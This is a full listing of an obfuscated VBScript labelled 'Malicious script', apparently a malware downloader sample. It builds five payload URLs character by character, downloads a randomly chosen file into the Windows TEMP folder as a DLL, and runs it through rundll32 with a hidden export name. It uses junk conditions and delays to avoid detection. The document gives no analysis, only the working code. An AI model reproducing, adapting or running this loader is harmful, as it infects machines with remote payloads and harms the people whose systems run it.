Malicious script

1. On Error Resume Next
2. Const BQb = 1, Ue = 2, Kn = 8
3. Const UEs = 1, WLv9 = 2, GEw9 = "437", KYp = 2
4. Function SDu6(BVt)
5. Dim Qx4, Xi, SAx1
6. Set Qx4 = CreateObject("ADODB.Stream")
7. Qx4.type = WLv9
8. Qx4.Charset = GEw9
9. Qx4.Open
10. Qx4.LoadFromFile BVt
11. SAx1 = Qx4.ReadText
12. Qx4.Close
13. SDu6 = ZBd(SAx1)
14. End Function
15. Sub VKq4(BVt, Pg0)
16. Dim Qx4, SAx1
17. Set Qx4 = CreateObject("ADODB.Stream")
18. Qx4.type = WLv9
19. Qx4.Charset = GEw9
20. Qx4.Open
21. SAx1 = ALs(Pg0)
22. Qx4.WriteText SAx1
23. Qx4.SaveToFile BVt, KYp
24. Qx4.Close
25. End Sub
26. Function Cv3(NHa0)
27. Dim SAx1, YLy5(0)
28. If NHa0 <= 0 Then
29. Err.Raise 50001, "", "asdfasdf", "", 0
30. ElseIf NHa0 = 1 Then
31. Cv3 = YLy5
32. Else
33. SAx1 = Space(NHa0-1)
34. Cv3 = Split(SAx1, " ")
35. End If
36. End Function
37. Function Cl3(url)
38. Dim DRq9, Zb9, Xi, Ox9
39. Dim Ir7, VMo(1)
40. Set DRq9 = CreateObject("Scripting.FileSystemObject")
41. VMo(0) = "WinHttp.WinHttpRequest.5.1"
42. VMo(1) = "MSXML2.XMLHTTP"
43. For Each Ir7 in VMo
44. Err.Clear
45. Set Zb9 = CreateObject(Ir7)
46. If Err.Number = 0 Then
47. Exit For
48. End If
49. Next
50. Zb9.Open "GET", url, False
51. Zb9.Send
52. Xi = Cv3(LenB(Zb9.ResponseBody))
53. For Ox9 = 1 To LenB(Zb9.ResponseBody)
54. Xi(Ox9-1) = AscB(MidB(Zb9.ResponseBody, Ox9, 1))
55. Next
56. Cl3 = Xi
57. End Function
58. Sub DQs( It, OJm )
59. Dim Ox9, Yp1, DRq9, Zb9, Ah9
60. Set DRq9 = CreateObject( "Scripting.FileSystemObject" )
61. If DRq9.FolderExists( OJm ) Then
62. Ah9 = DRq9.BuildPath( OJm, Mid( It, InStrRev( It, "/" ) + 1 ) )
63. ElseIf DRq9.FolderExists( Left( OJm, InStrRev( OJm, "\" ) - 1 ) ) Then
64. Ah9 = OJm
65. Else
66. WScript.Echo "ERROR: Target folder not found."
67. Exit Sub
68. End If
69. Set Yp1 = DRq9.OpenTextFile( Ah9, Ue, True )
70. Set Zb9 = CreateObject( "WinHttp.WinHttpRequest.5.1" )
71. Zb9.Open "GET", It, False
72. Zb9.Send
73. For Ox9 = 1 To LenB( Zb9.ResponseBody )
74. Yp1.Write Chr( AscB( MidB( Zb9.ResponseBody, Ox9, 1 ) ) )
75. Next
76. Yp1.Close( )
77. End Sub
78. Function FSn7()
79. Dim Lw6, Sz, ROm
80. Set Lw6 = CreateObject("WScript.Shell")
81. Set Sz = Lw6.Environment("System")
82. ROm = Sz("PROCESSOR_ARCHITECTURE")
83. If LCase(ROm) = "amd64" Then
84. FSn7 = Lw6.ExpandEnvironmentStrings("%SystemRoot%\SysWOW64\rundll32.exe")
85. Else
86. FSn7 = Lw6.ExpandEnvironmentStrings("%SystemRoot%\system32\rundll32.exe")
87. End If
88. End Function
89. Sub Ab(Bx0, Jn0, QRs5)
90. Dim Lw6, DRq9, Yp1, Sd, Ib1
91. Set Lw6 = CreateObject("WScript.Shell")
92. Set DRq9 = CreateObject("Scripting.FileSystemObject")
93. Set Yp1 = DRq9.GetFile(Bx0)
94. Sd = Yp1.ShortPath
95. Ib1 = FSn7() + " " + Sd + "," + Jn0 + " " + QRs5
96. If 2 > 1 Then
97. Lw6.Run(Ib1)
98. End If
99. End Sub
100. Function NMa6(Bx0)
101. Dim DRq9
102. Set DRq9 = CreateObject("Scripting.FileSystemObject")
103. NMa6 = DRq9.FileExists(Bx0)
104. End Function
105. Function SWu0(Bx0)
106. Dim DRq9, Yp1
107. Set DRq9 = CreateObject("Scripting.FileSystemObject")
108. Set Yp1 = DRq9.GetFile(Bx0)
109. SWu0 = Yp1.ShortPath
110. End Function
111. Function TEv5(CTi, Nh0)
112. Dim NHa0
113. NHa0 = CDbl(Int(CDbl(CTi)/CDbl(Nh0)))
114. TEv5 = CDbl(CTi) - NHa0 * CDbl(Nh0)
115. End Function
116. Function Ng(LCl0, SAx1)
117. SAx1(1) = 172 * SAx1(1) Mod 30307
118. SAx1(0) = 171 * SAx1(0) Mod 30269
119. SAx1(2) = 170 * SAx1(2) Mod 30323
120. Dim Lp3
121. Lp3 = TEv5((CDbl(SAx1(0))/30269.0 + CDbl(SAx1(1))/30307.0 + CDbl(SAx1(2))/30323.0), 1.0)
122. Ng = Int(Lp3 * CDbl(LCl0))
123. End Function
124. Function Yg0(KFe)
125. Yg0 = CInt(KFe*Rnd())
126. End Function
127. Sub Jo(LQh)
128. WScript.Sleep(LQh)
129. End Sub
130. Randomize
131. Dim Je(2), AMb, BJy(4), BVt
132. Je(0) = 1256
133. Je(1) = 21487
134. Je(2) = 14252
135. AMb = 21
136. If 1=1 Then
137. BJy(0) = "http://" & "t" & "a" & "s" & "t" & "e" & "b" & "u" & "d" & "s" & "m" & "a" & "r" & "k" & "e" & "t" & "i" & "n" & "g" & "." & "c" & "o" & "m" & "/" & "u" & "w" & "6" & "l" & "i" & "n"
138. End If
139. If 1=1 Then
140. BJy(1) = "http://" & "m" & "e" & "c" & "h" & "a" & "p" & "." & "c" & "o" & "m" & "/" & "x" & "d" & "7" & "u" & "h"
141. End If
142. If 1=1 Then
143. BJy(2) = "http://" & "c" & "o" & "f" & "f" & "e" & "e" & "t" & "e" & "a" & "s" & "h" & "o" & "p" & "." & "r" & "u" & "/" & "d" & "a" & "z" & "2" & "r" & "p"
144. End If
145. If 1=1 Then
146. BJy(3) = "http://" & "f" & "i" & "c" & "u" & "s" & "s" & "a" & "l" & "m" & "." & "c" & "o" & "m" & "/" & "0" & "b" & "q" & "z" & "c" & "n" & "9" & "6"
147. End If
148. If 1=1 Then
149. BJy(4) = "http://" & "w" & "a" & "y" & "n" & "e" & "s" & "i" & "n" & "e" & "w" & "." & "c" & "o" & "m" & "/" & "0" & "f" & "q" & "t" & "9" & "h" & "e" & "1"
150. End If
151. BVt = "Tqg8ceGBV4iU4AM2"
152. Dim Lw6, Nj, Zj, Sg5, LQh
153. Set objShell = CreateObject("WS"&"cript.Shell")
154. Nj = objShell.ExpandEnvironmentStrings("%" & "T"&"EMP%")
155. Dim ODc, FOl8, JPf0, Wn9, Ox9
156. FOl8 = False
157. For Ox9=0 To 10: Do
158. Zj = Nj + "\" + BVt + CStr(Ox9) + ".dll"
159. If NMa6(Zj) Then
160. Sg5 = SWu0(Zj) & ".txt"
161. If NMa6(Sg5) Then
162. WScript.Quit(0)
163. End If
164. End If
165. If Not FOl8 Then
166. ODc = Yg0(UBound(BJy))
167. DQs BJy(ODc), Zj
168. If Err.Number <> 0 Then
169. Exit Do
170. End If
171. FOl8 = True
172. End If
173. Ab Zj, "E"&"n"&"hancedStoragePasswordConfig", "1"&"47"
174. LQh = 24700
175. Jo LQh
176. Loop While False: Next
177. If 3=3 Then
178. WScript.Quit(1)
179. End If